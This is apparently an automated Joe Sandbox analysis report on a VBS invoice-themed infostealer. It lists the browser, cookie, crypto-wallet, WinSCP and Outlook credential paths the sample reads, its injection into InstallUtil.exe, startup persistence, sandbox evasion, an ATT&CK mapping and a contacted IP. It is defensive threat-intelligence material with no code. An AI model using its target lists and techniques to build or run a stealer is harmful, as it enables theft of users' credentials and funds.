                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: InstallUtil.exe, 00000009.00000002.1450013749.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum@\
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash@\
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx L4
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC@\
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Ethereum\keystore
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus@\
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q@C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum@\
                Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q9C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1410025378.0000000007810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.1617686351.0000000003324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information121
                Scripting
                Valid Accounts141
                Windows Management Instrumentation
                121
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                211
                Process Injection
                3
                Obfuscated Files or Information
                1
                Credentials in Registry
                34
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Software Packing
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                2
                Registry Run Keys / Startup Folder
                2
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS141
                Security Software Discovery
                Distributed Component Object Model1
                Clipboard Data
                1
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts51
                Virtualization/Sandbox Evasion
                Cached Domain Credentials51
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                Process Injection
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546109 Sample: Fattura-24SC-99245969925904... Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 51 90.168.9.0.in-addr.arpa 2->51 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Discord Token Stealer 2->69 71 7 other signatures 2->71 9 wscript.exe 1 2->9         started        12 wscript.exe 1 2->12         started        14 cmd.exe 2 2->14         started        signatures3 process4 file5 81 Malicious encrypted Powershell command line found 9->81 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->83 85 Creates processes via WMI 9->85 17 Fattura-24SC-99245969925904728562.vbs.exe 18 9->17         started        21 wscript.exe 1 12->21         started        49 Fattura-24SC-99245...25904728562.vbs.exe, PE32 14->49 dropped 23 conhost.exe 14->23         started        signatures6 process7 file8 43 C:\Users\user\AppData\...\OSDescription.vbs, ASCII 17->43 dropped 45 C:\Users\user\AppData\...\OSDescription.vbs, ASCII 17->45 dropped 55 Found many strings related to Crypto-Wallets (likely being stolen) 17->55 57 Drops VBS files to the startup folder 17->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->59 63 5 other signatures 17->63 25 InstallUtil.exe 3 17->25         started        29 conhost.exe 17->29         started        61 Malicious encrypted Powershell command line found 21->61 31 OSDescription.vbs.exe 21->31         started        33 cmd.exe 21->33         started        signatures9 process10 dnsIp11 53 185.36.141.107, 49706, 49729, 49793 AS-DBNETZDE European Union 25->53 87 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->87 89 Tries to steal Mail credentials (via file / registry access) 25->89 91 Found many strings related to Crypto-Wallets (likely being stolen) 25->91 93 Tries to harvest and steal Bitcoin Wallet information 25->93 95 Writes to foreign memory regions 31->95 97 Powershell is started from unusual location (likely to bypass HIPS) 31->97 99 Injects a PE file into a foreign processes 31->99 101 2 other signatures 31->101 36 InstallUtil.exe 31->36         started        39 conhost.exe 31->39         started        47 C:\Users\user\...\OSDescription.vbs.exe, PE32 33->47 dropped 41 conhost.exe 33->41         started        file12 signatures13 process14 signatures15 73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 36->73 75 Tries to steal Mail credentials (via file / registry access) 36->75 77 Tries to harvest and steal browser information (history, passwords, etc) 36->77 79 Tries to harvest and steal Bitcoin Wallet information 36->79

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Fattura-24SC-99245969925904728562.vbs26%ReversingLabsScript-WScript.Trojan.Heuristic
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\OSDescription.vbs.exe0%ReversingLabs
                C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                https://support.mozilla.org/products/firefox0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://crl.micro0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                90.168.9.0.in-addr.arpa
                unknown
                unknownfalse
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://nuget.org/NuGet.exeFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/ac/?q=InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://stackoverflow.com/q/14436606/23354Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/mgravell/protobuf-netJFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1632367660.0000000004063000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      http://pesterbdd.com/images/Pester.pngOSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlOSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1539348684.000000000277E000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://contoso.com/LicenseOSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://discordapp.com/api/v9/users/InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://contoso.com/IconOSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://github.com/mgravell/protobuf-netFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpfalse
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.ecosia.org/newtab/InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brInstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.com/Pester/PesterOSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://support.mozilla.org/products/firefoxInstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ac.ecosia.org/autocomplete?q=InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://github.com/mgravell/protobuf-netiFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpfalse
                                unknown
                                http://crl.microFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://aka.ms/pscore6lBFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://stackoverflow.com/q/11564914/23354;Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://stackoverflow.com/q/2152978/23354Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://icanhazip.com/InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://nuget.org/nuget.exeFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://steamcommunity.com/profiles/InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.36.141.107
                                    unknownEuropean Union
                                    35368AS-DBNETZDEfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1546109
                                    Start date and time:2024-10-31 14:15:06 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 55s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Fattura-24SC-99245969925904728562.vbs
                                    Detection:MAL
                                    Classification:mal100.bank.troj.spyw.expl.evad.winVBS@18/10@2/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 90%
                                    • Number of executed functions: 588
                                    • Number of non-executed functions: 14
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: Fattura-24SC-99245969925904728562.vbs
                                    TimeTypeDescription
                                    09:16:09API Interceptor16x Sleep call for process: Fattura-24SC-99245969925904728562.vbs.exe modified
                                    09:16:13API Interceptor98x Sleep call for process: InstallUtil.exe modified
                                    11:14:10API Interceptor14x Sleep call for process: OSDescription.vbs.exe modified
                                    14:16:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs
                                    No context
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AS-DBNETZDEZRemI0ixC6.dllGet hashmaliciousBumbleBeeBrowse
                                    • 185.36.140.112
                                    PWzQpJQHzb.msiGet hashmaliciousUnknownBrowse
                                    • 185.36.140.112
                                    Q6yuW8YIMR.dllGet hashmaliciousBumbleBeeBrowse
                                    • 185.36.140.112
                                    7rbJdaTZe2.dllGet hashmaliciousBumbleBeeBrowse
                                    • 185.36.140.112
                                    1JYlOOKImO.dllGet hashmaliciousBumbleBeeBrowse
                                    • 185.36.140.112
                                    bGvIeUxVdy.msiGet hashmaliciousUnknownBrowse
                                    • 185.36.140.112
                                    QsLhL1pw3t.msiGet hashmaliciousUnknownBrowse
                                    • 185.36.140.112
                                    https://mariculturasalinas.com/za/zap/enter.phpGet hashmaliciousUnknownBrowse
                                    • 185.36.141.52
                                    http://mxi.fr/json/upload/dkjxff.php?lfitf5pGet hashmaliciousUnknownBrowse
                                    • 185.36.140.14
                                    Rechnung-62671596778856538170.vbsGet hashmaliciousPureLog StealerBrowse
                                    • 185.36.141.52
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Roaming\OSDescription.vbs.exeilZhNx3JAc.batGet hashmaliciousAgentTeslaBrowse
